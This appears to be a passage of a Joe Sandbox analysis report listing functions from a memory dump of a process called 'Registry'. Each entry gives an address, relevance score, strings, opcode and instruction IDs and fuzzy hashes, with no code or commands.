Function 00007FFD9B770A01 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B770A1A

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 20547782610b383a8daaec7ec0404afcbf866bd4327bad79ba7ab4a882e6ff33
Instruction ID: 5b233899d722f5c3412623e76b37682e297db582777ecb7449f911b20b89c83b
Opcode Fuzzy Hash: 20547782610b383a8daaec7ec0404afcbf866bd4327bad79ba7ab4a882e6ff33
Instruction Fuzzy Hash: 75119431E1960E4FEB50EBA8C8996BD77E0FF18700F4246B6D41CC71B6EE74A5448740

Function 00007FFD9B77EBA3 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

+, xrefs: 00007FFD9B77EC76

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: 042c8822fd8381c20a281c0355cad49c3cfa672e6176fc511483e2fe8a2bbf36
Instruction ID: 083364dc4d64b6e8c863cb230a883304e9a7dc414fa2f19d04d53cee4d0dc027
Opcode Fuzzy Hash: 042c8822fd8381c20a281c0355cad49c3cfa672e6176fc511483e2fe8a2bbf36
Instruction Fuzzy Hash: D831B470A0562D8FDB69DF54C8A4BA9B7B6EB55300F4002EA904DE72A1CB746F80CF01

Function 00007FFD9B77C0E5 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B77C0FA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 53fc47e6dcff67e4a2719c1a65eb48abeed8eb600e7851cce61c521ff1f2e31e
Instruction ID: 5aed561e5497346dcc66997a1fcb629fc9abdded7a48ee806edfa51d71dbe480
Opcode Fuzzy Hash: 53fc47e6dcff67e4a2719c1a65eb48abeed8eb600e7851cce61c521ff1f2e31e
Instruction Fuzzy Hash: 6C116170E2564E8FEB54EFA4C4A96B977E0FF18305F5105BAD419C71A1EB74A644C700

Function 00007FFD9B7734E5 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B7734FA

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 739e75cc7290588f6b9859c54fa4de49e9679a5280df4a5d42ed30989a819eef
Instruction ID: 7e7f9d64f11a34c8ce56ef35b26cd6e623988144268801874bf5f187d11b5288
Opcode Fuzzy Hash: 739e75cc7290588f6b9859c54fa4de49e9679a5280df4a5d42ed30989a819eef
Instruction Fuzzy Hash: 18118E70A1964E8FDB58EB74C468ABA7BF0FF18305F4205BED429C71A1DB74A6408700

Function 00007FFD9B772E21 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B772E3A

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 54095eebdca1930ccab68b14a06032e99ab1f9fc5f3cd4c6b6f80dd8a9cee041
Instruction ID: 534d54640ebce0f6ce615d2982fffc6eb6ce64eeddd4ee2e086a7ae785eff8f9
Opcode Fuzzy Hash: 54095eebdca1930ccab68b14a06032e99ab1f9fc5f3cd4c6b6f80dd8a9cee041
Instruction Fuzzy Hash: 74018F30E1A64E4FE751EBA4889CAA97BE0FF1A305F4255B6D418C71B6EB78E5448700

Function 00007FFD9B771C4D Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B771C5A

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: e4a41b5c2d85f3212d7d3624c1246481641a26c0f336de83d92496002bfdfc7c
Instruction ID: 6c0278e6a18ad258d8930bb863b14fafd1b9cb48dab03a90cde2ffd213ac636d
Opcode Fuzzy Hash: e4a41b5c2d85f3212d7d3624c1246481641a26c0f336de83d92496002bfdfc7c
Instruction Fuzzy Hash: 2BF0D130A0A74E8FDB58DF6088A96BA37A0EF55305F4141BAD808C75E1CB75A550C740

Function 00007FFD9B77EF0A Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

g, xrefs: 00007FFD9B77EF24

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction ID: e7e6115cc3f53377197d190de222f5ae73eb693bc68800fdc088552c154b3d98
Opcode Fuzzy Hash: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction Fuzzy Hash: 61D09220A0861C8BDB65EA44C8A179972A5AB04300F0001A0900C972A0CB746F80CB41

Function 00007FFD9B770525 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145496a2d298fba699c820dfd7d8007beefa355a98c9b22ea0875f1129f08096
Instruction ID: 6e30b78da28a2c33d15b4e3e10bd4a9afdff85d0dbb2dc41c2021f46a4dd125a
Opcode Fuzzy Hash: 145496a2d298fba699c820dfd7d8007beefa355a98c9b22ea0875f1129f08096
Instruction Fuzzy Hash: 46B12347B0F6D20FEB2166BC68B55F97B91EF916A470902F7E098CA0F7EC08650683C1

Function 00007FFD9B7705A0 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c22f1b11fd446c65b9a65aa32df472b28c026e7eeea1131fe71cc85245e853
Instruction ID: 9bb867321fa51dc6fe05fab45c1405fe2828d5f9d10fa91684d0d583635b71aa
Opcode Fuzzy Hash: 22c22f1b11fd446c65b9a65aa32df472b28c026e7eeea1131fe71cc85245e853
Instruction Fuzzy Hash: AD911443B0F7D60FEB2166B868755F97B91EF516A870902F7E0D8CA0F7AC58650682C1

Function 00007FFD9B77060D Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7326f17fa502fc497ed8da832f6361b4c9c7a4029e7351e7e33d74e9713208b1
Instruction ID: 3af91fd6b76ba40a964abba9476b1d3dc3f33f6c1e2fe1fb36ec996b648bae63
Opcode Fuzzy Hash: 7326f17fa502fc497ed8da832f6361b4c9c7a4029e7351e7e33d74e9713208b1
Instruction Fuzzy Hash: 96811443B0F7D20FEB2166BC68755E97B91EF516A4B0902F7E098CA0F7AC58660682C1

Function 00007FFD9B770638 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75638de1ffe927569fdd2dd5016b9fd1cc1456d1d452a2e59082dea2c7e9d57c
Instruction ID: c60b95e0f3cb966eb338aa879bee2d583c6dbd188d35b8a566dbd9a6793ecb89
Opcode Fuzzy Hash: 75638de1ffe927569fdd2dd5016b9fd1cc1456d1d452a2e59082dea2c7e9d57c
Instruction Fuzzy Hash: E3811653B0F7C60FEB2166BC68655E97B91EF516A470902F7E098CB0F7EC54A50583C1

Function 00007FFD9B771698 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93348fdda3fe407fd426e0f29ba1a2003e4614ac551f37ba07969f805cb9d029
Instruction ID: 4af06b61f4c7f234a6f1ebceb25c921d24d51d458d5545592f79342f0595e07b
Opcode Fuzzy Hash: 93348fdda3fe407fd426e0f29ba1a2003e4614ac551f37ba07969f805cb9d029
Instruction Fuzzy Hash: FD81CE31B0DB494FDB68DE5C88A59A977E2FFD8300B15427AE45DC32A6DE70AD028781

Function 00007FFD9B770640 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd4ed3775ab9c187bd18c7819a9d64aedd4920d073e4aace3ad91f1ec6fa0fda
Instruction ID: b54665204c9402dcb955231f7447a823db4172436f6f720836e5456437b9c35a
Opcode Fuzzy Hash: bd4ed3775ab9c187bd18c7819a9d64aedd4920d073e4aace3ad91f1ec6fa0fda
Instruction Fuzzy Hash: 8A710683B0F7C10FEB2166F868755F97B91EF516A470942F7E0998A0F7EC58660683C1

Function 00007FFD9B77B270 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4881a9633e961b9562af41dc98a57bd38f98e8924730b0fdd560bc4721c0b1f9
Instruction ID: 63619211e0534fe5d9728b410613cff19135483cf0121c02219c519815ab8b1e
Opcode Fuzzy Hash: 4881a9633e961b9562af41dc98a57bd38f98e8924730b0fdd560bc4721c0b1f9
Instruction Fuzzy Hash: AA510531B0E64E9FE711ABB888B89F93BE0FF56314B0642B6D018C71B3EE64A5458340

Function 00007FFD9B77C5B9 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1cc99c24a6aad4ac807720e4e0151ebe26cfbc4e071ad0d2a19f964649b545b
Instruction ID: 8a486f332bb68bd090dc44789c5af735b8c58e9b603ca60beb5da424c3c77b20
Opcode Fuzzy Hash: f1cc99c24a6aad4ac807720e4e0151ebe26cfbc4e071ad0d2a19f964649b545b
Instruction Fuzzy Hash: F1513D70E0960D8FEB64EBA8C4A56FD7BB1EF59300F11027AD009E72A2DF786941CB40

Function 00007FFD9B77B288 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50427e3238973ea13c5933aab2e5c4974a132552ae7f788448274c42ead2286
Instruction ID: 5223029f05f8d4bb4b5a30e8b1f0faafd7880d9606b0c889e9535998ac659f67
Opcode Fuzzy Hash: f50427e3238973ea13c5933aab2e5c4974a132552ae7f788448274c42ead2286
Instruction Fuzzy Hash: 10412B22A0F78A8FE3129BB848785F93BA0FF52204B0A42F7D068871F3DE55951A8351

Function 00007FFD9B77C6E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ec1fa2b05c5f87adabdb938d114c0111ef2112f5d9693ee22e72a635e0cae7
Instruction ID: 704133cc80c6aa3b864d05ece6215a67ce9362914376f519c59cc4697475cc59
Opcode Fuzzy Hash: 97ec1fa2b05c5f87adabdb938d114c0111ef2112f5d9693ee22e72a635e0cae7
Instruction Fuzzy Hash: 18312171E0DA1D8FDBA4EBA894A56BC77B1FF59300F410279D00DD72A2DF6469018740

Function 00007FFD9B77D14D Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94695299274892a7591c9a55e5c78a26edaf0f81b4feab6f6d698e4fc4903881
Instruction ID: 861e0ab9b7f616326938a991146c4967f78ece2de8946c31bc08c0b318843904
Opcode Fuzzy Hash: 94695299274892a7591c9a55e5c78a26edaf0f81b4feab6f6d698e4fc4903881
Instruction Fuzzy Hash: 1D21F137B08A1E8AE714BABCF4992FD73A0EF55322B0106B7E049C50A2DE3461848B90

Function 00007FFD9B7733B8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491a0637f9c5f84c38eee2994edeeefcb905fec1cf5ba9c7a709b6731a1330a3
Instruction ID: 60c78bf1406610ada9f18ced359f5ddba005c68fb498bb00e597be12b5e6f186
Opcode Fuzzy Hash: 491a0637f9c5f84c38eee2994edeeefcb905fec1cf5ba9c7a709b6731a1330a3
Instruction Fuzzy Hash: E031D53194E78E8FD752DBA088989E93FF0EF16311F1A06B6D445C70B2DA7CA646C720

Function 00007FFD9B770805 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b332190aac276e8182c815b411c2b6ede8fc540e2c8ba90efd11ebe2383882
Instruction ID: 8ff77ff7c98184a29b38d6bd569dced8111fe71e1621dc9a219bbc04cd6c9842
Opcode Fuzzy Hash: 96b332190aac276e8182c815b411c2b6ede8fc540e2c8ba90efd11ebe2383882
Instruction Fuzzy Hash: 8A218B52B0E6869BEB1067B898796E937D0EF11318F0A41F7D099CA0E3DD18A15AC290

Function 00007FFD9B7732A8 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a4c36b9a3d07940c47a45a548c4c31c20c82b448bc174f8cdf18611400bffe
Instruction ID: 01c76dbd70f63c5b192246520594c562e9c4df6c960404649eae560b55a35e0e
Opcode Fuzzy Hash: 71a4c36b9a3d07940c47a45a548c4c31c20c82b448bc174f8cdf18611400bffe
Instruction Fuzzy Hash: B831F670E0961D8FEB64EB98C4A4AEDBBF1FF59301F554139D009E72A5CA786A41CF10

Function 00007FFD9B77D856 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f3d8bf546220e286c9b92318fb5441c852734a1bc44550ed5b60dbeda5958c
Instruction ID: 97607ce80a26f2fe320180b76f64391dda3c0866a91ee0a0d6378c88651d0b94
Opcode Fuzzy Hash: c2f3d8bf546220e286c9b92318fb5441c852734a1bc44550ed5b60dbeda5958c
Instruction Fuzzy Hash: 2521F8B0E0961E8FDB64EFE8D4A56FDBBB0EF48310F11017AD009F32A1CA7866408B50

Function 00007FFD9B77CDF0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a2537bda324f44575f6a68945afd010a0163b7b5680ea95a592fe65533967f3
Instruction ID: 3b7818c80b410cbf0621011451822f7e9e1ec41dbf3855e42028485e48f58007
Opcode Fuzzy Hash: 0a2537bda324f44575f6a68945afd010a0163b7b5680ea95a592fe65533967f3
Instruction Fuzzy Hash: EB116D30A0A68E8EEB56EB7488695B97BB0FF19300F1605BAD419C70B2DEB56A54C740

Function 00007FFD9B77119D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5add70cca934f2a35cd6d9aa36ddba5baf5e1ef70bebefaf4e715b992ceb7d39
Instruction ID: 428f971322f9d45c609358066f0c546efdcb49b5a87091b0fd974074423806fa
Opcode Fuzzy Hash: 5add70cca934f2a35cd6d9aa36ddba5baf5e1ef70bebefaf4e715b992ceb7d39
Instruction Fuzzy Hash: 2911E230E1A64E4FEB68DBA488A86B97BE0FF55300F0105BEC01ACB4F1EE646650C700

Function 00007FFD9B77AAA1 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571e961f4333b8f93d93fb888f09db4f931782fe3a0b94f8553ddc85a2a4bf7b
Instruction ID: ff42ad29f18ef02c20ecfb98d645148cd36d5446efc9c4fdf39171a4952fbd8d
Opcode Fuzzy Hash: 571e961f4333b8f93d93fb888f09db4f931782fe3a0b94f8553ddc85a2a4bf7b
Instruction Fuzzy Hash: E7017C31A1A60E8FEB51ABA494A95EA77E0EF29305F5245B6D408C70B2EA34A6848700

Function 00007FFD9B7705D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d1ab406577efd237ebf0fcf94e0710658a3d667aef01f6ab62ebaae1e2fa62
Instruction ID: 28d1a885bb2618d8a3562cb762ae64ff49c78aa181e95281cf5421ab4eb32622
Opcode Fuzzy Hash: d9d1ab406577efd237ebf0fcf94e0710658a3d667aef01f6ab62ebaae1e2fa62
Instruction Fuzzy Hash: F7018C30A0AA0E8FEB58EFA4C0A96B977A1EF58305F61457ED40EC35F4CA71A650CB40

Function 00007FFD9B77B0E8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2bda0e00aa7210d5862e21ea57e51a0dc29c73f686737ddbbca207c2e6bcf2
Instruction ID: ac76056c7ee47a7c036efa727cc2258a752898b126bfe1bcb88c59c003dbe8e7
Opcode Fuzzy Hash: ec2bda0e00aa7210d5862e21ea57e51a0dc29c73f686737ddbbca207c2e6bcf2
Instruction Fuzzy Hash: 90014C30E15A0E8EEB55EBA4C8A86BE76A0FF18306F11097AE41ED25A0DE306650C640

Function 00007FFD9B7727FD Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e432adbe61363406160deb0dc2b25153df657709015804e8d162ca76ce1e6c
Instruction ID: 9196c1f8fac3378000ca2394ff036a2fbf9fa33616fc3b9a24d7ea555c6ec068
Opcode Fuzzy Hash: 43e432adbe61363406160deb0dc2b25153df657709015804e8d162ca76ce1e6c
Instruction Fuzzy Hash: 0F01D430E1E64E4FE751EBA484986B97BE0EF19300F4206F6D418C30B2EE78E5448700

Function 00007FFD9B772E99 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdeb83a3cf26897eb6ae7582fd0020676619d26318a34f0e4106c568e17c09c
Instruction ID: e6f2aec06645ec5c09c2fac86cfaf8adad69cc845835702146a7c5fb27e6b03e
Opcode Fuzzy Hash: 7bdeb83a3cf26897eb6ae7582fd0020676619d26318a34f0e4106c568e17c09c
Instruction Fuzzy Hash: 44017131A0A74E5FE751E7B4889D5A97BE0EF56300F0609B3D018C70B6DA68A6448711

Function 00007FFD9B77BC27 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b715ad109b01cac559ae63b69ee165616d029aac8ed1b89ce9791a341445cd45
Instruction ID: d5bff2a6a7763a80636d89e39133283ade23cc82a39a8ff5df38dbdbf26313c4
Opcode Fuzzy Hash: b715ad109b01cac559ae63b69ee165616d029aac8ed1b89ce9791a341445cd45
Instruction Fuzzy Hash: D901C070E1661D9EEBA4EB54C8A5AECB6F1FB59300F1146B6D40DE32A1DF746A80CF00

Function 00007FFD9B770608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8369450b89abeba583302a4fcc88da437fe53a38527fd63a883195e0225c7d
Instruction ID: 4ed5465b45d94b721f31361f300dd5d5c0ec60e14706a36a8e34fb5abf5259e4
Opcode Fuzzy Hash: ec8369450b89abeba583302a4fcc88da437fe53a38527fd63a883195e0225c7d
Instruction Fuzzy Hash: 1101D630A1660E8BEB58EBA4C4A85B973A0FF19305F50097ED42EC31F1DE75A240CA40

Function 00007FFD9B770610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a50e3e049786c8bb4ec0e0fa4db4b0d7aff82ae70a715795e16ba32d2815ca
Instruction ID: 2d53b15a13539e285b16b04ea23e7802fcdf7cc77e0ea6f35e2fd0d6f7ac819d
Opcode Fuzzy Hash: 87a50e3e049786c8bb4ec0e0fa4db4b0d7aff82ae70a715795e16ba32d2815ca
Instruction Fuzzy Hash: DD01A230A1660E8EDB58EBB4C4A86B973A0FF19305F50097ED42EC31F4DE75A590CA40

Function 00007FFD9B77AF88 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5a58196fc9f3d6ba648b37bd65f1ff0565c79d621bc4524b961e1a95446fa5
Instruction ID: 5e136069085829e9bf26dde4c26e885dbe5ffda80592f20c189d0045b515ae6f
Opcode Fuzzy Hash: db5a58196fc9f3d6ba648b37bd65f1ff0565c79d621bc4524b961e1a95446fa5
Instruction Fuzzy Hash: C2F08130B15A0E8BEB58EFA4C4A56BA76A0FF18306F11057ED41FC24F5DE356650C640

Function 00007FFD9B7705D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89664b9dc10ab8b0cefb671baf5f8f617bee522507f23460666e7ec08bebad1d
Instruction ID: a1144626f99f6d5b2a52e08c7d30eda69928c595a5857a44a68e6e3799818fd9
Opcode Fuzzy Hash: 89664b9dc10ab8b0cefb671baf5f8f617bee522507f23460666e7ec08bebad1d
Instruction Fuzzy Hash: 4EF0C830A0A64E8FEB54DEA494A95F93790EF55304F110579E40DC34F1CE75A550C740

Function 00007FFD9B77AECC Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1968629942.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b770000_Registry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd6cd97ac3d9e5761d65586adcb193a332d95ce1fe31cb5ac17924ee81f2a67f
Instruction ID: dd6c03ea8b05c8ba839e96e28e19eb08c5d977a5cf8ffabb9742831cfaaf457e
Opcode Fuzzy Hash: cd6cd97ac3d9e5761d65586adcb193a332d95ce1fe31cb5ac17924ee81f2a67f
Instruction Fuzzy Hash: C4F0C831E0E60E5EF760FBB884A95B976E0EF18300F120972D408C30B5EDB4E2448640

Function 00007FFD9B7711B0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

